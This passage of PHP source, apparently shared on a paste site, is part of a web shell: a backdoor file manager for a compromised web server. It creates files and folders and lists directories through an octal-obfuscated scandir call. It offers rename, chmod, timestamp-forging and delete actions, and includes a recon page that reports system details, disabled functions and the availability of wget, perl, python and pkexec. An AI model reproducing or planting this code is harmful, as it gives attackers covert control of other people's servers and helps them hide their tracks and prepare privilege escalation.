<button type='sumbit' class='btn btn-outline-light' style='width:200px; height:36px;' height:30;' name='bikin'>CREATE</button> 
<a href='?path=".$serlok."' class='btn btn-outline-light'>Back</a><br>
</form></center>";
} else {
createfile();
}exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
function createDirectory() {
if (empty($_POST['add'])) {
echo '<table class="directory-listing-table" style="border-color:orange;"><td><font color="orange">Folder field is required</font> [<a href="?path='.$_GET['path'].'&'.net("buatfolder").'=opet"><i class="fa-solid fa-folder-plus" aria-hidden="true"></i>Create again</a>]</td></table>';
} else {
$add = $_POST["add"];
$haxorqt = mkdir($_GET['path']."/".$add);
if ($haxorqt == true) {
echo "<table class='directory-listing-table' style='border-color:lime;'><td>Created =><font color=lime> ".$_GET['path']."/</font><font color='orange'>$add</font><br>
<a href='?path=".$_GET['path']."/$add'><u>Click Here</u></a></td></table>";
} else {
echo "<table class='directory-listing-table' style='border-color:red;'><td><font color=red><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create folder : $add</font></td></table>";
}
}
}
if (!isset($_POST['submit'])) {
echo '<table class="directory-listing-table"><td>
<form action="" method = "POST"><h5><i class="fa fa-folder-plus"></i> Create Folder</h5><hr><center>
<div style="width:300px;">
<input type="text" class="form-control" placeholder="Folder Name" name="add" id="add"/><br></div>
<button type="submit" class="btn btn-outline-light" name="submit" value="Create directory" style="width:120px;">Create</button> 
<a href="?path='.$serlok.'" class="btn btn-outline-light" style="width:120px;">Back</a><br><br></form></td></table>';
} else {
createDirectory();
}exit();
} elseif ($_REQUEST[net('info')] == "opet") {
echo "<table class='directory-listing-table' align='center'>
<div id='content'><tr><td>";
echo "Server : <font color=orang>".$_SERVER['HTTP_HOST']."</font><br>";
echo "Server IP : <font color=orange>".ipserv()."</font>  <br> Your IP : <font color=orange>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "Web Server : <font color='orange'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
echo "System : <font color='orange'>".php_uname()."</font><br>";
echo "User : <font color='orange'>".@get_current_user()." </font>( <font color='orange'>".@getmyuid()."</font>)<br>";
echo "PHP Version : <font color='orange'>".@phpversion()." </font>=><font color='orange'> ".php_sapi_name()."</font><br>";
echo "</tr></td><tr><td>Disable Function : ".$disf."</font>";
echo "</div></tr></td><tr><td>";
echo "<hr>Orecle : ";
if (function_exists('oci_connect')) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
echo " | SSH2 : ";
}
if (function_exists('ssh2_connect')) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo "  | cURL : ";
if (function_exists("curl_init")) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo "  | WGET : ";
if (file_exists("/usr/bin/wget")) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo "  | Perl : ";
if (file_exists("/usr/bin/perl")) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
echo "  | Python : ";
if (file_exists("/usr/bin/python2")) {
echo "<font color=lime>ON</font>";
} else {
echo "<font color=red>OFF</font>";
}
$pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
echo " | PKEXEC : $pkexec<br><br>";
echo "</tr></td></table><br>";
exit();
}
if (!is_readable($serlok)) {
die("<table class='directory-listing-table'><thead><td><center><font color=orange>This directory is unreadable :(</font></center></td></thead></table>");
}
echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 20px black;width:90%;border-left:1px solid #ffc107;border-right:1px solid #ffc107;border-bottom:1px solid #ffc107;--bs-border-radius:80rem;" align="center">
<thead style="--bs-table-bg:#ffc107;--bs-table-color:#000;"><tr>
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Last Modified</center></th>
<th><center>Owner</center></th>
<th><center>Permissions</center></th>
<th><center>Actions</center></th>
</tr></thead><center>';
$scd = "\163\143"."\141\156\144"."\151\162";
if(is_readable($serlok)){
$fetch=$scd($serlok);
$serlokbos=array();
$filez=array();
foreach($fetch as $fols){
if($fols=='.'||$fols=='..'){
continue;
}
$haxorqts=$serlok.'/'.$fols;
if(is_dir($haxorqts)){
array_push($serlokbos,$fols);
}elseif(is_file($haxorqts)){
array_push($filez,$fols);
}
}
}
foreach($serlokbos as $dir){
echo "<tr>
<td><i class='fa fa-folder' style='color: #FAA625'></i> <a href=\"?path=".$serlok."/".$dir."\">".$dir."</a></td>
<td><center>Dir</center></td>
<td><center>".filedate($serlok."/".$dir)."</center></td>
<td>".owner($serlok."/".$dir)."</td>
<td><center>";
if(is_writable($serlok."/".$dir)) echo '<font color="lime">';
elseif(!is_readable($serlok."/".$dir)) echo '<font color="red">';
echo statusnya($serlok."/".$dir);
if(is_writable($serlok."/".$dir) || !is_readable($serlok."/".$dir)) echo '</font>';
echo "</center></td>
<td><center><form method=\"POST\" action=\"?pilihan&path=$serlok\">
<div class='btn-group me-2' role='group' aria-label='First group'>
<button type='submit' class='btn btn-outline-secondary badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil' style='color: #fff'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmodf'><i class='fa fa-gear' style='color: #06D2D5'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdatef'><i class='fa fa-calendar' style='color: #5654F5'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #E53A3A'></i></button></div>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$serlok/$dir\">
</form></center></td>
</tr>";
}
foreach($filez as $file) {
if(!is_file("$serlok/$file")) continue;
$size = filesize("$serlok/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = '<font color="aqua">'.round($size/1024,2).'</font> MB';
} else {
$size = '<font color="#E6F01C">'.$size.'</font> KB';
}
echo "<tr>
<td>".cekfile($serlok."/".$file)."
<a href=\"?viewfile=".$serlok."/$file&path=".$serlok."\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($serlok."/".$file)."</center></td>
<td>".owner($serlok."/".$file)."</td>
<td><center>";
if(is_writable("$serlok/$file")) echo '<font color="lime">';
elseif(!is_readable("$serlok/$file")) echo '<font color="red">';
echo statusnya("$serlok/$file");
if(is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '</font>';
echo "</center></td><td><center>
<form method='post' action='?pilihan&path=$serlok'>
<div class='btn-group' role='group' aria-label='First group'>";
echo gazz($file);
echo "</div><input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$serlok/$file\">
</form></center></td></tr>";
}
echo '</tr></td></table></table>';
author();
function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
</body>
</html>

Add Comment

Please, Sign In to add comment